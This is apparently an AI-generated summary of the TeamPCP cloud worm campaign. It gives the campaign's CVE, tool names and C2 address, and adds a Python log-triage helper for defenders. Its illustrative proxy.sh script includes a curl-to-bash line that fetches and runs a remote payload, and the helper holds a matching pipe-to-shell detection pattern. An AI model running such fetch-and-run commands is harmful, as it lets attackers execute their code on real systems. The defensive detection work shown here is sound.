TeamPCP Worm Exploits Cloud Infrastructure to Build Criminal Infrastructure
These articles are AI-generated summaries. Please check the original sources for full details.
The TeamPCP campaign, observed around December 25, 2025, has systematically targeted cloud-native environments to set up malicious infrastructure for follow-on exploitation, leveraging exposed Docker APIs, Kubernetes clusters, Ray dashboards, and Redis servers. The campaign has been attributed to a threat cluster known as TeamPCP, which has been active since at least November 2025.
Why This Matters
The TeamPCP campaign highlights the technical reality of cloud-native cybercrime, where attackers leverage misconfigured infrastructure and known vulnerabilities to build a distributed proxy and scanning infrastructure at scale. This approach allows them to compromise servers, exfiltrate data, deploy ransomware, conduct extortion, and mine cryptocurrency, resulting in significant financial losses and reputational damage. According to Flare security researcher Assaf Morag, the campaign’s goal was to build a self-propagating criminal ecosystem, which has already affected over 700 victims across diverse industries.
Key Insights
- The TeamPCP campaign exploits known vulnerabilities, such as React2Shell (CVE-2025-55182, CVSS score: 10.0), to achieve remote command execution at scale.
- The campaign uses existing tools, such as proxy.sh, scanner.py, kube.py, react.py, and pcpcat.py, to automate and industrialize the exploitation process.
- The compromised infrastructure is misused for a wide range of purposes, including cryptocurrency mining, data hosting, proxying, and command-and-control (C2) relays, with the C2 server node located at 67.217.57[.]240 linked to the operation of Sliver, an open-source C2 framework.
Working Example
#!/bin/bash
# Example of proxy.sh script
# Install proxy, peer-to-peer (P2P), and tunneling utilities
apt-get update && apt-get install -y proxychains-ng
# Deliver various scanners to continuously search the internet for vulnerable and misconfigured servers
git clone https://github.com/DeadCatx3/CIDR-lists.git
# Perform environment fingerprinting at execution time
if [ -f "/etc/kubernetes/kubelet.conf" ]; then
    # Drop a cluster-specific secondary payload
    curl -s https://example.com/payload.sh | bash
fi
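As an added illustration that is not from the original article or from the campaign's tooling, the following Python triage helper scans log lines for the artifacts the summary names in Key Insights and in the quoted script: the tool filenames, the C2 address (matched in plain or defanged form), and the download-and-pipe-to-shell behaviour. The log format and the sample lines are constructed assumptions.

```python
"""Triage helper: flag log lines carrying the TeamPCP artifacts named in the summary."""
import re

# Tool filenames named in the summary (tuple keeps match order deterministic).
TEAMPCP_TOOLS = ("proxy.sh", "scanner.py", "kube.py", "react.py", "pcpcat.py")
# C2 address from the summary; the defanged form is accepted as well.
TEAMPCP_C2 = "67.217.57.240"
TEAMPCP_C2_DEFANGED = "67.217.57[.]240"
# Behavioural pattern taken from the quoted proxy.sh: fetch a script and pipe it to a shell.
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba)?sh\b")


def classify(line: str) -> list[str]:
    """Return a list of indicator tags found in one log line (empty list if clean)."""
    hits: list[str] = []
    for tool in TEAMPCP_TOOLS:
        # Lookbehind avoids matching e.g. 'myproxy.sh' as 'proxy.sh'.
        if re.search(r"(?<![\w.])" + re.escape(tool) + r"\b", line):
            hits.append(f"tool:{tool}")
    if TEAMPCP_C2 in line or TEAMPCP_C2_DEFANGED in line:
        hits.append(f"c2:{TEAMPCP_C2}")
    if PIPE_TO_SHELL.search(line):
        hits.append("pattern:pipe-to-shell")
    return hits


def triage(lines: list[str]) -> dict[int, list[str]]:
    """Map the index of every flagged line to its indicator tags."""
    return {i: tags for i, line in enumerate(lines) if (tags := classify(line))}


# Constructed sample audit lines (assumed format: timestamp host event details).
SAMPLE_LOGS = [
    "2025-12-25T03:14:07Z host-a execve: /bin/bash /tmp/proxy.sh",
    "2025-12-25T03:14:09Z host-a conn: 10.0.0.5:44120 -> 67.217.57.240:443 proto=tcp",
    "2025-12-25T03:14:12Z host-a execve: /bin/sh -c 'curl -s http://203.0.113.9/p.sh | bash'",
    "2025-12-25T03:15:00Z host-b execve: /usr/bin/python3 /opt/app/manage.py runserver",
    "2025-12-25T03:15:30Z host-b execve: /usr/bin/python3 /tmp/kube.py --list",
]

if __name__ == "__main__":
    for idx, tags in triage(SAMPLE_LOGS).items():
        print(f"line {idx}: {', '.join(tags)}")
```

Run against real process-execution and network-connection logs, the same `classify` function can feed an alert rule; the defanged-IP branch lets the indicator be pasted straight from a report.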
Practical Applications
- Use Case: Amazon Web Services (AWS) and Microsoft Azure environments are primarily targeted by the TeamPCP campaign, which demonstrates the importance of securing cloud infrastructure against opportunistic attacks.
- Pitfall: Organizations that run misconfigured infrastructure become “collateral victims” in the process, highlighting the need for regular security audits and vulnerability assessments to prevent such attacks.